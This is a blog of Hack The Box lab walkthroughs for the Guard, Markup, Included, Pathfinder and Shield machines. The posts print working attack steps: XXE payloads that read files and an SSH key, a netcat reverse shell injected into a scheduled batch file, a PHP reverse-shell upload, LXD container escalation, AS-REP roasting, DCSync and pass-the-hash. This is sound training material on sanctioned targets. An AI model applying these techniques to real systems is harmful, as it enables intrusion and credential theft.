Guard has been Pwned!

haxez is back, back again, hacking machines, tell a friend. That’s right, back again with another writeup of a Hack The Box Machine. This time we are looking at Guard, please check out my other posts on hack ArchetypeOopsie, VaccineShieldPathfinder, Included and Markup if you haven’t already done so.


Hacking this machine was incredibly fun and it didn’t take very long. Lets get straight in to it. First thing I always like to check is whether the box responds to ping requests. This helps to determine whether the machine is online or not.

└──╼ [★]$ sudo ping | tee -a ping.
[sudo] password for joe:
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=63 time=37.1 ms
64 bytes from icmp_seq=2 ttl=63 time=21.8 ms
64 bytes from icmp_seq=3 ttl=63 time=21.9 ms
64 bytes from icmp_seq=4 ttl=63 time=22.4 ms

You may notice that I tend to pipe a lot of my commands to tee -a filename.txt. This is a habbit I got in to after a few exams. I also copy the output in to a seperate text file called notes. I tend to write the walkthroughs as I hack and it doesn’t hurt to have more than one copy of something.

We know the box is responding to pings so let’s see what services are actually listening on the box. We can do this by running an nmap scan.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- | tee -a nmap.
Starting Nmap 7.91 ( ) at 2021–09–13 17:06 BST
Nmap scan report for
Host is up (0.023s latency).
Not shown: 65535 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:64:23:e0:a7:ec:1d:3b:f0:63:72:a7:d7:05:57:71 (RSA)
| 256 b3:86:5d:3d:c9:d1:70:ea:d6:3d:36:a6:c5:f2:be:5d (ECDSA)
|_ 256 c0:5b:13:0f:d6:e6:d1:71:2d:55:e2:4a:e2:27:0e:c2 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see ).

Foothold Hack

The only thing listening on the box appears to be SSH. We could try and bruteforce it with Hydra but I don’t think that’s the intended approach. Since SSH is the only active service I’m going to assume that we should have the credentials already from a previous box. The machine Markup had an XXE vulnerability that allowed us to recover an SSH private key for the user daniel. Lets see if that works.

└──╼ [★]$ ssh -i daniel.key [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0–88-generic x86_64)
Last login: Mon Sep 13 15:38:53 2021 from
[email protected]:~$

Lovely jubbly the key from the last box worked a treat. We are now on the box but no matter what I tried I couldn’t cat the user.txt file. Something funny was going on. I initially tried to get a shell through Vim as I have used that technique before turns out man was our man! By using the man command we can then “escape” to a shell by typing !bash.

Hack man pages to shell
Hack man pages to shell

And now we can capture the user flag.

[email protected]:~$ cat user.txt

So what’s next? there is a whole lot of file system to look through and not a lot of commands at our disposal. I tried to grab linPEAS from a self hosted Python server but anything I tried to do to download it failed.

[email protected]:~$ curl
curl: (7) Couldn’t connect to server
[email protected]:~$ ping
ping: socket: Permission denied
[email protected]:~$
bash: No such file or directory
[email protected]:~$ wget
 — 2021–09–13 16:48:20 —
Connecting to… failed: Permission denied.

Further Enumeration

Right, it looks like we don’t have permissions to access the socket at all. Not good. Well I guess it’s time for some SSH magic. You can pipe commands through SSH which should allow me to run linPEAS on the remote host from a script on my local system.

─[eu-vip-22]─[]─[[email protected]]─[~]
└──╼ [★]$ sudo ssh -i daniel.key [email protected] ‘bash -s’ < /Path/To/

Honestly, nothing quite beats the feeling you get when you do something hacky and it works. Now linPEAS was running on the remote host it was time to go through the output. I noticed some interesting things.

[+] Looking for ssl/ssh files
/home/picasso/.ssh/authorized_keys /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
PermitRootLogin yes
PubkeyAuthentication yes
PasswordAuthentication yes

Firstly, root could login with a password rather than requiring a public and private key pair. I’m not sure if this is going to make things harder or easier at this point but it’s good to take note of it.

[+] Looking for specific hashes inside files — less false positives (limit 70)

It looks like linPEAS was able to grab a hash from a backup shadow file. This has got to be the way we get on to the box as root. lets check out the backup file.

[email protected]:~$ cat /var/backups/shadow

Privilege Escalation Hack

I’ve snipped out the stuff we don’t need and you can see that the backup file contains the hashes for both root and daniel. Ok let’s grab a copy of it and crack it offline. It should be noted that I also noticed I could cat the /etc/passwd file. With that in mind I grabbed a copy of that too as I was going to use unshadow and attempt to crack it with JohnTheRipper.

└──╼ [★]$ sudo unshadow passwd.txt shadow.txt > passwords.txt

Unfortunately, John didn’t like the file and was unable to crack them so I switched to hashcat with the rockyou wordlist.

└──╼ [★]$ sudo hashcat -m 1800 — force root.hash /usr/share/wordlists/rockyou.txt$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:password#1

Session……….: hashcat
Status………..: Cracked
Hash.Name……..: sha512crypt $6$, SHA512 (Unix)
Hash.Target……: $6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbv…82hY31
Time.Started…..: Mon Sep 13 17:57:10 2021, (1 min, 3 secs)
Time.Estimated…: Mon Sep 13 17:58:13 2021, (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 1751 H/s (6.91ms) @ Accel:32 Loops:512 Thr:1 Vec:4
Recovered……..: 1/1 (100.00%) Digests
Progress………: 110336/14344386 (0.77%)
Rejected………: 0/110336 (0.00%)
Restore.Point….: 110208/14344386 (0.77%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:4608–5000
Candidates.#1….: pooh-bear -> pashaungu

The password turned out to be “password#1”. I honestly think we could have brute forced that quite quickly but alas, we were then able to login to the machine as root and capture the root flag.

└──╼ [★]$ ssh [email protected]
[email protected]’s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0–88-generic x86_64)
Last login: Mon Sep 13 15:50:13 2021 from
[email protected]:~# cat root.txt

Markup has been Pwned!

And we’re hack to hack the starter track. By that I mean it’s time to hack another machine from the Starting Point of Hack The Box. I have been going through the Starting Point machines one by one and so far we have been able to hack ArchetypeOopsie, VaccineShieldPathfinder and Included. Now it’s time to move on to Markup!

This is a great box which took me longer than it should have due to my own mistakes. Oh well, it was great fun and I felt silly after I realised what I was doing wrong.


So first we ping.

└──╼ [★]$ sudo ping | tee -a ping.
[sudo] password for joe:
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=127 time=240 ms

“IT IS ALIVVEE” so lets go ahead and nmap this sucker.

└──╼ [★]$ sudo nmap -sC -sV -p0- -T4
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags:

I’ve snipped out the parts we don’t need to see. So we have a web server and Secure Shell running. This is a Windows box right? okie dokie lets take a look at the website.

This is a screenshot of the website we are trying to hack.
Markup Website Login

Ok so not a lot going on. I had a quick poke at it with Nikto and dirb but I didn’t find anything that interesting. Lets try the credentials we recovered from the previous box Pathfinder.

The is a screen shot of the website we are trying to hack with valid credentials.
Markup Website Login

Ok great, those seem to have worked. The website has some basic functionality that allows you to place orders. If we capture the request and look at it with Burp we can see that it’s using XML. Furthermore, we can perform an XML injection (XXE External Entity Injection) attack to receive the contents of the win.ini file.

<?xml version=”1.0" encoding=”UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///c:/windows/win.ini”> ]> <order> <quantity> 1337 </quantity> <item> &xxe; </item> <address> haktheplanet </address> </order>
This is a screen shot of burp repeater showing how to perform a XML injection Hack
Markup XXE Attack 1

Foothold Hack

Ok so we know we can grab files through the XXE attack, whats next? Wasn’t there and SSH port open when we performed the nmap scan? Ok lets find out where Windows stores it’s SSH keys. So by pointing our payload at the .ssh/id_rsa file we should be able to recover the private key.

<?xml version=”1.0" encoding=”UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM 'file:///C:/Users/Daniel/.ssh/id_rsa'> ]> <order> <quantity> 1337 </quantity> <item> &xxe; </item> <address> haktheplanet </address> </order>
This is a gif of XML Hack being performed.
XXE to get RSA

Ok so I grabbed the key and saved it in a file called daniel.key. Make sure to place this in a directory that you own and make sure to change the file permissions to 600. You can do that using chmod 600 file.ext. So next we try to SSH to the server with Daniels key.

This is a gif of trying to ssh to the machine we want to Hack
SSH to Markup

Woop, we have access to the box, let’s see if we can grab the user.txt from Daniel’s desktop.

└──╼ [★]$ sudo ssh -i daniel.key [email protected]
Microsoft Windows [Version 10.0.17763.107]
© 2018 Microsoft Corporation. All rights [email protected] C:\Users\daniel>whoami
markup\[email protected] C:\Users\daniel>type C:\Users\Daniel\Desktop\user.txt

We are on the box and have successfully captured the user flag, we need to find a way to escalate our privileges to administrator to capture that all elusive root.txt flag. I downloaded winPEAS and hosted it using the python http module. Once the file was downloaded to the target machine I ran it to see if there were any interesting files.

This is a picture of a directory listing containing winPEASE which we will use to find a way to Hack the machine.
[email protected] C:\Users\daniel\Documents>powershell -Command (New-Object Net.WebClient).DownloadFile(‘', ‘win.exe’)
This is a gif of winPEAS running on the machine we want to Hack

Ok so after a bit of digging around I found a couple of things that I thought would be useful. The first one was a password, it didn’t seem to work for the administrator though but yoink, will keep that for later.

This is a screenshot of some credentials that winPEAS found on the machine we want to Hack

The next thing winPEAS found was an interesting directory and file that all users appeared to have access to.

This is a screenshot of an interesting file path on the server we want to Hack

Privilege Escalation Hack

This isn’t a typical directory or file you find on a Windows system so it was worth investigating. I ran the icacls command on the file to see what permissions were assigned to it.

PS C:\Users\daniel\Documents> icacls C:\Log-Management\job.bat
C:\Log-Management\job.bat BUILTIN\Users:(F)
Successfully processed 1 files; Failed processing 0 files

So it looks like built in users have full control over the file, that includes daniel. Ok so lets see what the file is actually doing. Using the type command it was possible to read the contents of the file.

[email protected] C:\Users\daniel\Documents>type C:\Log-Management\job.bat 
@echo off 
FOR /F “tokens=1,2*” %%V IN (‘bcdedit’) DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F “tokens=*” %%G in (‘wevtutil.exe el’) DO (call :do_clear “%%G”)
echo Event Logs have been cleared!
goto theEnd
wevtutil.exe cl %1
goto :eof
echo You must run this script as an Administrator!

So the script appears be an automated script to clear the logs but it requires being an admin to run it. So I had a look at a walkthrough at this point and noticed that others had said the script was running as a scheduled task and that whatever command you echo in to the file would be executed the next time it ran. I had a look at the scheduled tasks and couldn’t find it. I ran schtasks and there was nothing in there relating to job.bat. If you know how this was initially found then please let me know.

So with that in mind I set about dropping a copy of netcat on the box using the same method we used to deliver winPEAS.

Invoke-WebRequest -OutFile nc64.exe

Then once the file was on the box, I echoed a command in to the job.bat file to tell it to execute nc64.exe or nc.exe (whichever you want to use) and connect back to my machine.

So this is where I messed up for the longest time. It was a really really silly mistake too. In order to make my life a bit easier, I upgraded from a Command Prompt session to a PowerShell session. Then whenever I ran the following command:

echo C:\Users\Daniel\nc64.exe -e cmd.exe 1234 > C:\Log-Management\job.bat

It would error and tell me that ‘e’ was too ambiguous, who knew the letter e could be so open to interpretation. Well anyway, I spent about an hour enclosing it with quotation marks and all the other stuff you do to try and echo a string in to the file. I even went as far as to encode it with base64. The string was being echoed in to the file but the shell wasn’t coming back to my local machine. To make matters worse, the file was being overwritten every time it ran so I felt like there was a problem with the machine.

Well there wasn’t a problem with the machine, there was a problem with my brain. I dropped down to Command Prompt from PowerShell, ran the command without any quotation marks, the ‘e’ was accepted and within seconds I had a reverse shell with Administrator privileges, and then I captured the root.txt flag.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt

So if you get to this point on the machine and you’re pulling your hair out wondering why your exploit wont work. Try changing from PowerShell to CMD when echoing the string to the job.bat and see if that works. Lesson learned. One thing I did find interesting though was that I created a payload using MSFVenom and dropped that on the box. I echoed the location in to the script but still didn’t get a shell when it executed. I ran type on the file to confirm that the text had been added. Very odd.

This image shows that the machine we were trying to hack has indeed be pwned!
Markup has been Pwned!

Included has been Pwned!

Ok it’s time to hack another machine from the Hack The Box Starting Point series. We have already managed to hack ArchetypeOopsie, Vaccine, Shield and Pathfinder. Today we are looking at the Included machine. This was a really fun box despite a frustrating ending. This box is fairly simple to start off with provided you notice everything that is going on.


So first of all we ping the box to see if it’s up.

└──╼ [★]$ sudo ping | tee -a ping.txt
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=63 time=21.5 ms

Next we run our nmap scan.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- | tee -a nmap.
Starting Nmap 7.91 ( ) at 2021–09–11 16:30 BST
Nmap scan report for
Host is up (0.022s latency).
Not shown: 65535 closed ports
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn’t have a title (text/html; charset=UTF-8).
|_Requested resource was
No exact OS matches for host (If you know what OS is running on it, see ).

Ok so only a webserver is running, or is it? So I went to poke at the website and immediately saw that the website was calling the index.php using a file parameter. Caught my eye because it seemed like quite an obvious naming convention for accessing files. So naturally I pointed it straight at the /etc/passwd file and immediately had the file returned back to me.

This is an image of the titan gears website that we are trying to hack.
Hack The Box Included File Inclusion
This is an image showing local file inclusion hack on the titan gears website.
Hack The Box Included /etc/passwd

Sweet where now? Well as other guides have mentioned, there is an interesting user in the /etc/passwd file. As you can see from the tool ouput below, the user tftp exists at the very bottom of the file with the home directory of /var/lib/tftpboot.

cat /mnt/root/etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin

Interesting, I confirmed that TFTP was open, it listens on UDP rather than TCP which is why our Nmap scan missed it. At this point I would also like to point out that Nessus missed the TFTP service too. It also missed the directory traversal vulnerability which I also felt was odd since I asked it to san for web vulnerabilities. Nikto also missed the directory traversal vulnerability so this is an important lesson that you can’t always rely on tools

This image shows Nessus scan results which doesn't really show that there is anything to hack.
Hack The Box Nessus Output

Foothold Hack

Anyway I’m getting side tracked. I pinched the tried and tested pentestmonkey/php-reverse-shell and configured it for my IP address and port. I then uploaded the file to the machine using tftp.

└──╼ [★]$ tftp
tftp> put phpshell.php phpshell.php
Sent 5681 bytes in 0.4 seconds

Once that was uploaded to the server I created my netcat listener and then ran curl against the URL to get a shell.

└──╼ [★]$ curl

I checked out the history and ran a few other tools but nothing of much interest. There was a user called mike by listing out the /home directory. I guess this is the user we need to escalate to, to proceed further. It looks like mike has the user.txt flag in his home directory to so this confirmed my suspicious. After failing for a while I decided to try and switch user to Mike using the password found on the previous machine Pathfinder. Yeah it worked.

bash-4.4$ ls /home/mike
ls /home/mike
alpine-v3.14-x86_64–20210909_2211.tar.gz user.txt
bash-4.4$ cat /home/mike/user.txt
cat: /home/mike/user.txt: Permission denied
bash-4.4$ su mike
su mike
Password: Sheffield19

With that I was able to capture the user flag.

bash-4.4$ cat /home/mike/user.txt
cat /home/mike/user.txt

So what next? Well it was time to perform some more enumeration on the machine. I grabbed a copy of Linpeas and hosted on my machine using Python’s simple http server. I then downloaded the script and ran it. Unfortunately, my VM crashed before I had chance to save the output but it turns out mike is a member of the lxd group.

At this point I checked the official walkthrough and attempted to follow the instructions. However for whatever reason I couldn’t get the lxd-alpine-builder script to work at all. Every time I ran the script, I just kept getting an error message telling me there was an invalid parameter. I tried to strace the script but the information it provided wasn’t much help either.

Privilege Escalation Hack

After a bit of google fu I found this awesome article by that essentially does the same thing but differently. So, I got to following the instructions there and created the image.

sudo su
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
sudo go get -d -v
cd $HOME/go/src/
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

With the image and the rootfs.squashfs file ready, I started the python server again and downloaded the files from my local machine to the Included machine.

[email protected]:~$ wget
2021–09–11 18:02:14 —
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2318336 (2.2M) [application/octet-stream]
Saving to: ‘rootfs.squashfs’
rootfs.squashfs 100%[===================>] 2.21M 3.17MB/s in [email protected]:~$ wget
2021–09–11 18:03:40 —
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 884 [application/x-xz]
Saving to: ‘lxd.tar.xz’
lxd.tar.xz 100%[===================>] 884 — .-KB/s in 0.005s

With the files now on the machine, I imported the image, configured it and ran it.

[email protected]:~$ lxc image import lxd.tar.xz rootfs.squashfs — alias alpine
[email protected]:~$ lxc init alpine privesc -c security.privileged=true
lxc init alpine privesc -c security.privileged=true
Creating privesc
[email protected]:~$ lxc list
lxc list
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — -+
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — -+
| privesc | STOPPED | | | PERSISTENT | 0 |
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — [email protected]:~$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
<st-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
[email protected]:~$ lxc start privesc
lxc start privesc
[email protected]:~$ lxc exec privesc /bin/sh
lxc exec privesc /bin/sh

While the shell wasn’t pretty, it did have root access and I was able to capture the final flag.

cd /mnt/root/root
/mnt/root/root # ^[[43;18Rcat root.txt
cat root.txt
This image shows the included machine that we were trying to hack being pwned!
Hack The Box Included Has Been Pwned!

Pathfinder has been Pwned!

Welcome back to haXez, a place where I hack boxes and write about them. I’m not pretending to be an elite hacker. in fact I hardly know anything. This place is for learning and for me to document my progress. We are currently working our way through the Starting Point on Hack The Box, so far we have managed to hack the following machines: Archetype, Oopsie, Vaccine and Shield. Today we are looking at Pathfinder.

This box was a lot of fun and straight forward thanks to the walkthrough from h4rithd. Yes, I’m using walkthroughs… Honestly though, a lot of the time on Hack The Box, the problem is knowing which questions to ask. If you don’t know about a certain tool or about that specific weakness in a software configuration. Then you could be looking for hours or even days to find a foothold. I’m here to learn about these tools and software configuration weaknesses. Not spend hours researching all the potential ways they could be exploited. Anyway, with that out the way, lets begin.


First I spun up the machine and connected to the VPN. Next I pinged the box to see if it was responding and yep, the machine started talking to me.

└──╼ [★]$ ping
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=127 time=21.6 ms

So what do we do next? We nmap of course.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- | tee -a nmap.txt
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h06m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021–09–11T17:34:17
|_ start_date: N/A

Well hello Domain Controller, have you come to tell me your secrets? Ok so there are a lot of services listening but the most important ones on a Domain Controller are usually: Server Message Block (SMB 445), Lightweight Directory Access Protocol (LDAP 389) and Kerberos (88). I did however immediately notice that port 53 TCP was open. Port 53 is used for DNS but you would normally only see it on UDP. If port 53 TCP is open then it usually means that the protocol is accepting DNS Zone transfer requests. Alas, hack failed, this one didn’t tell me anything.

└──╼ [★]$ dig axfr @ MEGACORP
; <<>> DiG 9.16.15-Debian <<>> axfr @ MEGACORP
; (1 server found)
;; global options: +cmd
; Transfer failed. :-(

So with that rabbit hole out the way it was time to look at Server Message Block. We need to see if it had been misconfigured to allow the listing of shares and stuff. I first ran enum4linux in hopes that it would give me some information. Honestly though, the tool just doesn’t seem to work that often. So next I used smbclient to see what was going on.

└──╼ [★]$ smbclient -L
Enter WORKGROUP\joe’s password:
Anonymous login successful
Sharename Type Comment
— — — — — — — — — — -

The Anonymous login was successful but there was nothing on there. Hmmm another dead end. Ok then, lets focus on LDAP and see what information we can interrogate out of it. At first I was getting nowhere. I got a bit of information out from the protocol using ldapsearch but nothing substantial.

└──╼ [★]$ sudo ldapsearch -x -h -s base namingcontexts
# extended LDIF
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
namingcontexts: DC=MEGACORP,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGACORP,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1

User Enumeration Hack

So what was next? Well this is where I turned to the walkthrough written by h4rithd. Honestly I wouldn’t have gotten any further if it wasn’t for this walkthrough. So it turns out that the Sandra user on the Shield box was quite important. I should have learnt my lesson by now but as soon as I get the root flag, I log off write up. Sandra appears to exist on this box and we can use their credentials to do some enumeration. Enter ldapdomaindump, this tool is cool. Running ldapdomaindump with sandra’s credentials we get a bunch of html files containing information about the domain.

This shows users on the machine we want to hack
Domain users
This shows the groups on the machine we want to hack
Domain users by group
This shows the users on the machine we want to hack.

Foothold Hack

The one user that should grab our attention is the svc_bes as it doesn’t require Kerberos pre authentication. If pre authentication isn’t required, then we can trick Kerberos in to giving us an encrypted Ticket Granting Ticket hash. We can then hack or crack it offline. I’m getting ahead of myself, more about that later. So lets grab that TGT hash! Using the Impacket tool we can request the TGT for the svc_bes user.

└──╼ [★]$ python3 /usr/share/doc/python3-impacket/examples/ MEGACORP.LOCAL/svc_bes -dc-ip -request -no-pass -format john
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc_bes
[email protected]:c818cd9132de09878439dd73cc96a930$73b8ea1807114952f569afabd24391f25818660e8386fa926857af7d6382ad42d9d24e80300fcb43ebdcd40b2bbb9d13b462a83b5b87417e341625a146b503e89fdb18a6ff80fcce6fe776160e45cbf7a32978eee153d5f3b55539cef3c4ac56763811ce5d1b856afa9fce10fa3cdda54828ba2dc047f5109697ca0d0fecd3387421e328240c9b17a9567faa8be961ac30a739d56a1b66d9d5f6b1df01f7176382a7a483527cea0a8c2105a0812d142333b0412734eeee144d9be74c16cb1b3220e881819120a2691a825f19fbb9761d1c23cba03c8ed84ac4203a0706fa4e7fd947150e65ff7a78c0f4f051ad61bb49

Yummmm, don’t you just love the smell of hashes in the morning, or anytime for that matter. Ok so what’s next? Well we need to talk to our mate John and ask him to do the dirty work. No I don’t me kill him. I mean crack him really hard with a rock. Grab the hash output and chuck it in a file. Then using your favourite non escapable text editor vim, or nano. Then, tell John where your rock is and ask him politely to beat the secrets out of him.

└──╼ [★]$ sudo john beshash.txt — wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Sheffield19 ([email protected])
1g 0:00:00:08 DONE (2021–09–11 12:22) 0.1157g/s 1227Kp/s 1227Kc/s 1227KC/s Sherbert!!..Shawnee
Use the “ — show” option to display all of the cracked passwords reliably
Session completed

Voila, the password is Sheffield19.

Story time, I once met Darren Kitchen from Hak5 in Sheffield when he was touring the UK on his motorcycle. I caught the train there from where I was staying for Uni and had a beer with him. Really cool guy but I couldn’t stay long as the last train was at midnight or something. Someone took a photo but I never got a copy. Hey photography man. If you’re out there, I would love the Picture of Darren and myself from the Hak5 Sheffield meet please.

Anyway, moving on. We now have the password and can use evil-winrm to hack in to the box and see what’s around.

└──╼ [★]$ evil-winrm -u svc_bes -p Sheffield19 -i
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github:
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_bes\Documents>
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt

Privilege Escalation Hack

Turns out what was around was the user flag and now we have successfully captured it. Ok so what’s next? We have a vaid set of credentials. Lets see if we can try and dump some secrets using the impacket tool This tool performs a DCSync hack against the machine due to the trust that is provided by the authenticated user. This means it is possible to use the domain replication privileges of the authenticated user to gather information from the domain. Including password hashes. For it to work though, we need to know If our user has domain replication privileges.

└──╼ [★]$ /usr/share/doc/python3-impacket/examples/ MEGACORP.LOCAL/svc_bes:[email protected]
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 — rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up…

We have an Administrator password hash. Lets be kind and pass it forward using

└──╼ [★]$ /usr/share/doc/python3-impacket/examples/ MEGACORP.LOCAL/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[*] Requesting shares on…..
[*] Found writable share ADMIN$
[*] Uploading file fpnaGrFs.exe
[*] Opening SVCManager on…..
[*] Creating service ovNb on…..
[*] Starting service ovNb…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
© 2018 Microsoft Corporation. All rights reserved.

He shoots, he scores, and for my final trick I will recover the root.txt flag.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
This shows that the machine we were trying to Hack has indeed been pwned!
Pathfinder has been Pwned!

Shield has been Pwned!

This box gave me more trouble than I care to admit. I wouldn’t classify it as super easy that’s for sure. I have owned around 30 machines so far and this one was up there on the frustrated me list. If you’re new to the site then these posts are following the Starting Point on Hack The Box, we have already hacked Archetype, Oopsie and Vaccine.


There are other great guides out for this box and I’m not pretending that I’m the first to write a walkthrough for it. artilleryRed, eldruin and many others have written great guides which I had to use to hack this box. I’m writing this merely as a way for me to better understand the techniques used and to document my progress.

So first things first we perform our tried and tested nmap scan and wait for the results.

[]─[[email protected]]─[/media/sf_admin/Shield/Output]
└──╼ [★]$ nmap -Pn -sC -sV — min-rate=1000 -T4 -p0- STATE SERVICE VERSION
80/tcp open tcpwrapped
| http-methods:
|_ Supported Methods: HEAD OPTIONS
|_http-server-header: Microsoft-IIS/10.0
3306/tcp open tcpwrapped
| mysql-info:
|_ MySQL Error: Host ‘’ is not allowed to connect to this MySQL server

It looks like we have a webserver and MySQL running so lets go and take a look at the webserver. Upon punching in the IP address we are greeted with a default Internet Information Services page. If we didn’t know before then we can deduct that this is a Windows box.

Ok so what else is there on this box, lets brute force the files and folders and see if there is anything that has been left behind by the creator.

[]─[[email protected]]─[/media/sf_admin/Shield/Output]
└──╼ [★]$ sudo dirb
DIRB v2.22
By The Dark Raver
— — — — — — — — -
START_TIME: Wed Sep 8 20:37:47 2021
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
— — — — — — — — -
— — Scanning URL: — — 
— Entering directory: — — 
+ (CODE:301|SIZE:0)

Okie dokie, we have a WordPress content management system installed. WordPress is probably the most used content management system available now. It probably also has the most documentation on how you hack it to shreds. After poking at it for a bit and not making much progress I looked at a walkthrough and saw that they were using credentials that were found on a previous box. Turns out the credentials worked, while reading the official walkthrough I also noticed that they used the Metasploit module wp_admin_shell_upload to hack a shell on to the box. I tried this and had no luck what so ever. I’ve included my configuration below so you can check it and let me know if I was doing anything wrong. The exploit worked but no session was created, who knows.

Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — -
PASSWORD [email protected]! yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME admin yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
